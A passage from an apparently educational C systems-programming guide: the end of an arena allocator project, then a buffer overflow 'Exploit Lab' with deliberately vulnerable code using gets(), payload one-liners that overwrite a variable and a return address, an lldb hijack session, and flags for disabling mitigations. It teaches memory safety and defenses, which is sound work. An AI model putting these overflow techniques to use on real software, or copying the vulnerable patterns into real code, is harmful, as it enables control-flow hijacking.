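    a->block_size = block_size;
}

void *grow_alloc(GrowArena *a, size_t size) {
    Block *b = a->head;
    if (b == NULL || size > b->capacity - b->offset) {
        // Current block is full: chain a new one, large enough for oversized requests.
        size_t cap = size > a->block_size ? size : a->block_size;
        Block *nb = block_new(cap);
        if (nb == NULL) return NULL;
        nb->next = b;
        a->head = b = nb;
    }
    void *p = b->data + b->offset;   // still a plain bump inside the block
    b->offset += size;
    return p;
}

// Free every block at once.
void grow_destroy(GrowArena *a) {
    Block *b = a->head;
    while (b != NULL) {
        Block *next = b->next;
        free(b);
        b = next;
    }
    a->head = NULL;
}
```

The tradeoff: allocation no longer fails just because one block is full, and existing pointers stay valid because blocks never move (unlike growing a single block with `realloc`). In exchange, each new block costs a call into the allocator, and the unused tail of every full block is wasted.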
Thinking Exercise: Design the Data Structure
Before coding, design your arena on paper:
```
Arena (1024 bytes total)
[ base ]----+
[ offset = 0 ] |
[ capacity = 1024 ] |
v
+----------------------------------------------------+
| empty space (1024 bytes) |
+----------------------------------------------------+
^
current position (base + offset)
After arena_alloc(arena, 100):
[ base ]----+
[ offset = 100 ] |
[ capacity = 1024 ] |
v
+----------------------------------------------------+
| USED: 100 bytes | empty space (924 bytes) |
+----------------------------------------------------+
^
current position (base + 100)
After arena_alloc(arena, 200):
[ offset = 300 ]
+----------------------------------------------------+
| USED: 100 | USED: 200 | empty (724 bytes) |
+----------------------------------------------------+
^
current position
```

Questions:
- What if the next allocation requests 800 bytes?
- How would you align the second allocation to 8 bytes?
- What happens to those 724 bytes after `arena_reset()`?
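For the alignment question, a worked check: the first allocation ends at offset 100, which is not a multiple of 8, so an 8-byte-aligned second allocation must skip 4 bytes and start at offset 104. After the 200-byte allocation the offset would be 304, leaving 720 bytes free instead of 724. A minimal sketch of the padding calculation (`padding_for` is a hypothetical name):

```c
#include <assert.h>
#include <stddef.h>

// Bytes of padding needed so that `offset` becomes a multiple of `alignment`.
// Uses %, so unlike the bit-mask trick it works for any non-zero alignment.
size_t padding_for(size_t offset, size_t alignment) {
    assert(alignment != 0);
    return (alignment - offset % alignment) % alignment;
}
```

Already-aligned offsets need no padding, which is why the outer `% alignment` is there.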
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is an arena allocator? When would you use one?”
- “What’s the time complexity of arena allocation vs malloc?”
- “Why can’t you free individual allocations from an arena?”
- “What is memory alignment and why does it matter?”
- “Compare arena allocators to pool allocators to general-purpose allocators.”
- “In what scenarios would an arena allocator be faster than malloc?”
Hints in Layers (Only If Stuck)
Hint 1: The Minimal Arena Struct

```c
#include <stddef.h>

typedef struct {
    char*  base;      // Start of memory block
    size_t offset;    // Current position (bytes used)
    size_t capacity;  // Total size of block
} Arena;
```

That's it! Three fields.

Hint 2: Basic arena_alloc

```c
void* arena_alloc(Arena* arena, size_t size) {
    // Written as a subtraction so a huge `size` cannot wrap around
    // (offset <= capacity always holds)
    if (size > arena->capacity - arena->offset) {
        return NULL; // Out of space
    }
    void* ptr = arena->base + arena->offset;
    arena->offset += size;
    return ptr;
}
```

This is the "bump." It's O(1)!

Hint 3: Alignment

To align to N bytes, round up the offset (N must be a power of two for this bit trick):

```c
size_t align_up(size_t offset, size_t alignment) {
    return (offset + alignment - 1) & ~(alignment - 1);
}

void* arena_alloc_aligned(Arena* arena, size_t size, size_t alignment) {
    // Aligning the offset aligns the address because mmap returns a page-aligned base
    size_t aligned_offset = align_up(arena->offset, alignment);
    if (aligned_offset > arena->capacity ||
        size > arena->capacity - aligned_offset) {
        return NULL;
    }
    void* ptr = arena->base + aligned_offset;
    arena->offset = aligned_offset + size;
    return ptr;
}
```

Hint 4: Use mmap for the Block

```c
#include <stdlib.h>
#include <sys/mman.h>

Arena* arena_create(size_t size) {
    Arena* arena = malloc(sizeof(Arena));
    if (arena == NULL) {
        return NULL;
    }
    arena->base = mmap(NULL, size, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (arena->base == MAP_FAILED) {  // mmap signals failure with MAP_FAILED, not NULL
        free(arena);
        return NULL;
    }
    arena->offset = 0;
    arena->capacity = size;
    return arena;
}

void arena_destroy(Arena* arena) {
    munmap(arena->base, arena->capacity);
    free(arena);
}
```

`mmap` gives you a large, zero-initialized block directly from the OS.

Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| Arena design patterns | “C Interfaces and Implementations” | Ch. 5-6 |
| Memory allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| mmap and virtual memory | “The Linux Programming Interface” | Ch. 49 |
| Alignment requirements | “Computer Systems: A Programmer’s Perspective” | Ch. 3.9.3 |
| Allocator strategies | “Operating Systems: Three Easy Pieces” | Ch. 17 |
Project 5: Exploit Lab (Buffer Overflow Playground)
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Programming Language: C
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Security / Systems Internals
- Software or Tool: GDB / Buffer Overflows
- Main Book: “Hacking: The Art of Exploitation” by Jon Erickson
What you’ll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruption—in a controlled environment.
Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where “undefined behavior” stops being a compiler warning and becomes observable reality.
Core challenges you’ll face:
- Overflowing a buffer to overwrite adjacent variables (maps to: buffer overflow)
- Overwriting a function’s return address on the stack (maps to: stack layout)
- Understanding why ASLR/stack canaries exist (maps to: why C doesn’t protect you)
- Using lldb to observe the corruption in real-time (maps to: debuggers see memory)
- Crafting input that survives null-byte restrictions (maps to: string representation)
Key Concepts:

| Concept | Resource |
|---|---|
| Stack smashing | “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson |
| Return-oriented programming basics | LiveOverflow YouTube - “Binary Exploitation” series |
| Using sanitizers | LLVM AddressSanitizer documentation |
- Difficulty: Intermediate-Advanced
- Time estimate: 1-2 weeks
- Prerequisites: Solid understanding of stack frames, comfort with lldb
Real World Outcome
When you complete this project, you’ll have concrete proof that buffer overflows aren’t just theoretical. Here’s what success looks like:
1. Basic Variable Overwrite (Level 1)
Running the exploit:
$ ./level1_vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
You win!
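What happened: The overflow wrote past the end of `buffer` into the adjacent `check` variable. The last four input bytes, `78 56 34 12`, are read back as 0x12345678 because x86-64 is little-endian (least significant byte first). This relies on the compiler placing `check` directly above `buffer`, so confirm the layout in lldb before building the exploit.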
Before the overflow (in lldb):
(lldb) frame variable
(char [64]) buffer = ""
(int) check = 0
After the overflow (in lldb):
(lldb) frame variable
(char [64]) buffer = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(int) check = 305419896 (0x12345678) // ← Overwritten!
2. Return Address Overwrite (Level 2)
Exploiting the program:
$ ./level2_vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
You shouldn't be able to call this function!
Segmentation fault: 11
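Both exploit strings are filler followed by a value in little-endian byte order. A minimal sketch of building such a payload in C, with a hypothetical helper `build_payload`. It also shows why the zero bytes matter: an argv string ends at its first zero byte, and `strcpy` stops there too, so for Level 2 only 75 bytes (72 filler bytes plus `56 11 40`) and a terminating zero are actually written. The overwrite still produces 0x401156 only if the original return address already has zero upper bytes, as it typically does for a non-PIE x86-64 Linux binary (an assumption about the lab setup):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Hypothetical helper: write `padding` filler bytes followed by `value`
// encoded little-endian in `width` bytes (8 for an x86-64 address).
// Returns the total number of bytes written to `out`.
size_t build_payload(unsigned char *out, size_t padding,
                     uint64_t value, size_t width) {
    assert(width <= 8);
    memset(out, 'A', padding);
    for (size_t i = 0; i < width; i++) {
        out[padding + i] = (unsigned char)(value >> (8 * i));  // lowest byte first
    }
    return padding + width;
}
```

`build_payload(buf, 64, 0x12345678, 4)` produces the Level 1 input, and `build_payload(buf, 72, 0x401156, 8)` produces the Level 2 input; calling `strlen` on the Level 2 result returns 75, the number of bytes `strcpy` copies before its terminator.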
Visual: Stack Corruption Step-by-Step
Before strcpy:
```
High addresses
┌────────────────────────────┐
│ Return Address             │ ← points back into main() (legitimate)
├────────────────────────────┤
│ Saved Frame Pointer        │ ← main()'s rbp
├────────────────────────────┤
│ buffer[64]                 │ ← Empty
│ (64 bytes)                 │
└────────────────────────────┘
Low addresses
```
After strcpy with 72 ‘A’s + address:
```
High addresses
┌────────────────────────────┐
│ Return Address             │ ← 0x0000000000401156 (win function!)
├────────────────────────────┤
│ Saved Frame Pointer        │ ← 0x4141414141414141 ('AAAAAAAA')
├────────────────────────────┤
│ buffer[64]                 │ ← 'AAAA...AAAA' (64 A's)
│ (64 bytes)                 │
└────────────────────────────┘
Low addresses
```
3. Full lldb Session Showing Exploitation
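Setting up the debugger (the addresses in this session are illustrative; look up the real address of `win` in your own build, for example with `image lookup --name win`):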
$ lldb ./level2_vuln
(lldb) breakpoint set --name vulnerable
Breakpoint 1: where = level2_vuln`vulnerable, address = 0x0000000100003f20
(lldb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
Before the vulnerability:
Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100003f20 level2_vuln`vulnerable
level2_vuln`vulnerable:
-> 0x100003f20 <+0>: push rbp
0x100003f21 <+1>: mov rbp, rsp
0x100003f24 <+4>: sub rsp, 0x50
(lldb) register read rsp rip
rsp = 0x00007fff5fbff8b8 ← points at the return address (prologue not run yet)
rip = 0x0000000100003f20 level2_vuln`vulnerable
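After strcpy executes (use `disassemble --name vulnerable` to find the instruction right after the `call` to `strcpy`, then stop there):
(lldb) breakpoint set --address <address after the strcpy call>
(lldb) continue
(lldb) memory read --size 8 --format x --count 10 $rbp-64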
0x7fff5fbff870: 0x4141414141414141 ← buffer starts here
0x7fff5fbff878: 0x4141414141414141
0x7fff5fbff880: 0x4141414141414141
0x7fff5fbff888: 0x4141414141414141
0x7fff5fbff890: 0x4141414141414141
0x7fff5fbff898: 0x4141414141414141
0x7fff5fbff8a0: 0x4141414141414141
0x7fff5fbff8a8: 0x4141414141414141
0x7fff5fbff8b0: 0x4141414141414141 ← saved rbp (corrupted!)
0x7fff5fbff8b8: 0x0000000000401156 ← return address (OVERWRITTEN to win!)
Step with `nexti` until `leave` has run and `ret` is the next instruction; the register dump now shows the corruption:
(lldb) register read
General Purpose Registers:
rax = 0x00007fff5fbff870
rbx = 0x0000000000000000
rcx = 0x00007fff5fbff870
rdx = 0x00007fff5fbff9c0
rdi = 0x00007fff5fbff870 ← points to our 'AAAA...' string
rsi = 0x00007fff5fbff9c0
rbp = 0x4141414141414141 ← CORRUPTED! Was a valid address
rsp = 0x00007fff5fbff8b8 ← points at the overwritten return address
rip = 0x0000000100003f45 ← still in vulnerable(), about to return
When the function returns:
(lldb) nexti
(lldb) register read rip
rip = 0x0000000000401156 ← Now executing win()!
Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
frame #0: 0x0000000000401156 level2_vuln`win
level2_vuln`win:
-> 0x401156 <+0>: push rbp
0x401157 <+1>: mov rbp, rsp
0x40115a <+4>: lea rdi, [rip + 0xe9b]
0x401161 <+11>: call puts
Terminal output:
You shouldn't be able to call this function!
You've successfully exploited the buffer overflow!
4. Detection with AddressSanitizer
When you compile the same program with -fsanitize=address, here’s what you see:
```
$ clang -fsanitize=address -g level2_vuln.c -o level2_vuln_asan
$ ./level2_vuln_asan $(python3 -c "print('A'*72 + 'BBBBBBBB')")
=================================================================
==23456==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee3bff8b0 at pc 0x000104a3c890 bp 0x7ffee3bff850 sp 0x7ffee3bff010
WRITE of size 81 at 0x7ffee3bff8b0 thread T0
#0 0x104a3c88f in strcpy
#1 0x104a02156 in vulnerable level2_vuln.c:12
#2 0x104a02089 in main level2_vuln.c:23
#3 0x7fff6c3a9cc8 in start
Address 0x7ffee3bff8b0 is located in stack of thread T0 at offset 96 in frame
#0 0x104a020cf in vulnerable level2_vuln.c:10
This frame has 1 object(s):
[32, 96) 'buffer' (line 11) ← 64-byte buffer
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow in strcpy
Shadow bytes around the buggy address:
=>0x1fffdc77fef0: 00 00 00 00 00 00[f3]f3 f3 f3 00 00 00 00 00 00
0x1fffdc77ff00: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
==23456==ABORTING
```
What this shows: AddressSanitizer caught the overflow immediately, showing:
- Exactly where the write occurred (`vulnerable` at level2_vuln.c:12)
- How much was written (81 bytes, the 80 input characters plus the terminating NUL, into a 64-byte buffer)
- The stack frame layout and what got corrupted (the first byte past `buffer`, marked `f3` for the stack's right redzone)
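The fix that ASan points to is refusing to copy more than the buffer holds. A minimal sketch of a checked replacement for the `strcpy` call in `vulnerable()`; `copy_checked` is a hypothetical name, and rejecting over-long input (rather than silently truncating it) is a design choice:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

// Copy src into dst (capacity dst_size) only if it fits together with its NUL.
// Returns 0 on success, -1 if src is too long (dst is then left as "").
int copy_checked(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && dst_size > 0 && src != NULL);
    size_t len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;               // refuse instead of overflowing
    }
    memcpy(dst, src, len + 1);   // +1 copies the terminator
    return 0;
}
```

With this in place, the 80-character ASan input is rejected before a single byte lands outside the 64-byte buffer, while inputs of up to 63 characters are copied as before.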
5. Deliverables
By the end of this project, you’ll have:
- A set of increasingly difficult vulnerable programs:
- `level1.c` - Variable overwrite
- `level2.c` - Return address overwrite
- `level3.c` - Calling a “win” function
- `level4.c` - (Advanced) Basic shellcode injection
- Exploit scripts for each level:
- Shows exact byte offsets
- Demonstrates little-endian encoding
- Includes comments explaining each step
- A detailed write-up (markdown) containing:
- Stack diagrams for each vulnerability
- lldb commands used to verify exploitation
- Before/after register and memory dumps
- Explanation of what would happen with ASLR/canaries enabled
- Discussion of modern mitigations (DEP, ASLR, stack canaries)
- Visual proof:
- Screenshots or terminal recordings of successful exploits
- lldb session logs showing return address modification
- AddressSanitizer output catching the vulnerabilities
Why This Matters
After completing this project, the phrase “buffer overflow” transforms from an abstract concept to a visceral understanding. You’ve seen:
- Memory corruption happening in real-time
- How a simple string copy can hijack program control flow
- Why security mitigations like ASLR exist
- That “undefined behavior” has very defined consequences
This knowledge is the foundation for understanding:
- Why modern languages emphasize memory safety
- How attackers think about software vulnerabilities
- What security researchers mean by “exploitable”
- Why code review and secure coding practices matter
Learning milestones:
- First milestone: You can overflow a buffer to change an adjacent variable’s value
- Second milestone: You can overwrite a return address to redirect execution
- Final milestone: You viscerally understand why memory safety matters
The Core Question You’re Answering
“Why do buffer overflows let attackers take over computers?”
This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, you’ll understand exactly how memory corruption becomes code execution—and why this is such a serious problem.
Concepts You Must Understand First
Stop and research these before coding:
- Stack Frame Layout (Critical!)
- What’s in a stack frame? (Local variables, saved frame pointer, return address)
- In what order are these laid out?
- Which direction does the stack grow? Which direction do arrays grow?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
- The Return Address
- What is the return address and where is it stored?
- What happens at the `call` instruction? At `ret`?
- What if you change the return address to point somewhere else?
- Book Reference: “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson
- Buffer Overflow Mechanics
- What happens when you write past the end of a buffer?
- Why does C allow this? (No bounds checking)
- What values can you overwrite?
- Modern Mitigations
- ASLR: Randomizes addresses on each run—why does this help?
- Stack Canaries: Magic values that detect overwrites—how do they work?
- NX/DEP: Non-executable stack—why is this effective?
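- How do you disable these for learning? (`-fno-stack-protector` removes canaries, `-z execstack` marks the stack executable, and `-no-pie` gives the program fixed code addresses. Stack and library randomization is an OS setting; on Linux you can turn it off for one run with `setarch "$(uname -m)" -R ./program`.)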
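To see how a canary catches an overflow, you can model a frame as a single byte array: the buffer, then a canary, then a fake return address. Because everything lives inside one array, the simulated overflow is well-defined C. This is only a model that assumes a fixed canary value; real compilers insert the check in the function epilogue and use a random per-process value:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Simulated frame layout: [ buffer | canary | fake return address ]
enum { BUF_SIZE = 64, CANARY_SIZE = 8, FRAME_SIZE = BUF_SIZE + CANARY_SIZE + 8 };

// Hypothetical fixed canary. Its zero byte means a string copy, which stops
// at NUL, cannot write the canary back intact and keep going past it.
static const uint64_t CANARY = 0x00a1b2c3d4e5f600ULL;

// Zero the frame and place the canary right after the buffer.
void frame_init(unsigned char frame[FRAME_SIZE]) {
    memset(frame, 0, FRAME_SIZE);
    memcpy(frame + BUF_SIZE, &CANARY, CANARY_SIZE);
}

// Model of an unchecked copy into the buffer region.
void frame_copy(unsigned char frame[FRAME_SIZE], const unsigned char *src, size_t n) {
    assert(n <= FRAME_SIZE);   // stay inside the simulated frame
    memcpy(frame, src, n);
}

// What the epilogue check does: compare the canary before returning.
int canary_intact(const unsigned char frame[FRAME_SIZE]) {
    uint64_t now;
    memcpy(&now, frame + BUF_SIZE, CANARY_SIZE);
    return now == CANARY;
}
```

Copying 64 bytes leaves `canary_intact` true; copying all 80 bytes, enough to reach the fake return address, makes it false. That is the point where a real glibc program aborts with `*** stack smashing detected ***` instead of returning.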
Questions to Guide Your Design
Before implementing, think through these:
- Level 1: Variable Overwrite
- Create a program with a buffer and an adjacent “secret” variable
- How do you overflow the buffer to change the secret?
- What’s the exact offset you need to write to?
- Level 2: Control Flow Hijack
- Create a program with a vulnerable function
- Where is the return address relative to the buffer?
- How do you calculate the exact bytes to overwrite?
- What address do you redirect execution to?
- Level 3: Calling a “Win” Function
- Create a program with a function that’s never called (`void win() { ... }`)
- How do you find the address of `win()`?
- Craft input that makes the program call `win()` when it shouldn’t
- Level 4: Shellcode (Advanced)
- What is shellcode?
- Why do you need the stack to be executable?
- How do you jump to your own code?
- What’s a NOP sled and why is it useful?
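For Level 1, one hypothetical way to make the layout deterministic is to keep both variables in a struct. C lays out struct members in declaration order, so `offsetof` gives the exact filler length, whereas separate locals can be reordered by the compiler. Writing past `buffer` into `check` is still undefined behavior; the struct only makes where the bytes land predictable. A minimal sketch:

```c
#include <assert.h>
#include <stddef.h>

// Hypothetical Level 1 layout: `check` is guaranteed to come after `buffer`.
struct level1_locals {
    char buffer[64];
    int  check;          // overflow target
};

// 64 is a multiple of int's alignment on common ABIs, so no padding sits between them.
static_assert(offsetof(struct level1_locals, check) == 64,
              "unexpected padding between buffer and check");

// Number of filler bytes to send before the bytes that should land in `check`.
size_t level1_filler(void) {
    return offsetof(struct level1_locals, check);
}
```

With this layout, 64 filler bytes followed by the four little-endian bytes of the magic value is exactly the Level 1 input.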
Thinking Exercise: Map the Stack
Draw the stack for this function:
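```c
#include <stdio.h>

// Deliberately vulnerable. gets() was removed in C11, so you may need
// -std=gnu99 (or an older standard) for <stdio.h> to declare it.
void vulnerable(void) {
    char buffer[64];
    int authenticated = 0;   // the compiler decides where this lands; check in lldb
    printf("Enter password: ");
    gets(buffer); // VULNERABLE!
    if (authenticated) {
        printf("Access granted!\n");
    } else {
        printf("Access denied.\n");
    }
}
```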
Draw the stack frame:
```
High addresses
+------------------------+
| return address         | <-- target for level 2
+------------------------+
| saved frame pointer    |
+------------------------+
| authenticated (4)      | <-- target for level 1
+------------------------+
|                        |
| buffer[64]             |
|                        |
+------------------------+
Low addresses
```

Questions:
- If `buffer` starts at offset 0, where is `authenticated`?
- What input would change `authenticated` to non-zero?
- Where is the return address relative to `buffer`?
- What input would overwrite the return address?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is a buffer overflow? How does it lead to code execution?”
- “Walk me through how a stack-based buffer overflow works.”
- “What is ASLR? How does it protect against exploits?”
- “What are stack canaries? How do they work?”
- “What’s the difference between a stack overflow and a buffer overflow?”
- “Why is `gets()` so dangerous? What should you use instead?”